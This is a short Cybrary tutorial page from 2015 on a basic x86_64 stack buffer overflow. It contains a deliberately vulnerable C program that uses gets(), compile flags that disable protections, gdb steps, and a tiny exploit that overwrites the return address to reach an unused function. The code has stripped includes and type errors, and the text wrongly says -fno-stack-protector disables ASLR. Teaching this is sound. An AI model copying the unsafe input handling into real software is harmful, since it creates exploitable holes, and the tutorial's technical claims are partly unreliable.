Ready to Start Your Career?

Tutorial: Basic Buffer Overflow

CryptoCodez 's profile image

By: CryptoCodez

September 1, 2015

Tutorial: Basic Buffer Overflow - Cybrary// Hey guys, today, I will give you a brief introduction to buffer overflows on Linux x86_64 machines.// So, let's start with a basic example in C:______________________________________________________________________________________________________________// First some standard includes, you should now them...#include#include#include// we create a vulnerable functionint vulnFunction(int a, int b){// it creates a buffer with a size of 128 bytes! Yes, 128 not 125; it uses multiples of 8!char Buffer1[125];// now we get some input that could be greater than the buffergets(Buffer1);// and a pointer to the buffer will be returnedreturn strdup(Buffer1);}int main(){vulnFunction(0,1);}// This will never be called...void Unused(){printf("Hacked!");exit(0);}______________________________________________________________________________________________________________Compile using: gcc ./first_vuln.c -o first_vuln -fno-stack-protector -zexecstack-zexecstack is to change the read & write mode of the stack to executable-fno-stack-protector is for simplicity; it disables the randomization of the stack(called address space layout randomization = ASLR)Q: So, what happens if we give an input greater than the buffer?A: It overrides everything from the beginning of the buffer until buffer begins + length of input;Let's try it out:perl -e 'print "A"x220 | ./first_vuln#to much input...Yeah it crashes....Now we start gdb to find some values:gdb -q ./first_vulnDisassemble the Unused function to get its start addressdisas UnusedNow, you should search for something like thisDump of assembler code for function Unused:0x000000000040061c : push %rbp // this will be the new return address...The stack is built like this:riprbp registerbuffer[128]Ok, we have our info. We need 128bytes for the buffer and 8 for the rbp register. After that, the rip begins.We need to overwrite the complete buffer and the rbp register and append a new return address...#include#include#includeint main(char *argv[]){int i = 0;for (i=0;i<34;i++)printf("1337");unsigned RIP = 0x000000000040061c;//0x000000000040061c;fwrite(&RIP,1,4,stdout);return 0;}Simply compile the exploit and run it like this:./first_exploit | ./first_vuln Have fun, and maybe you should read some more tutorials on buffer overflows. Greets, AnonOverflow
Schedule Demo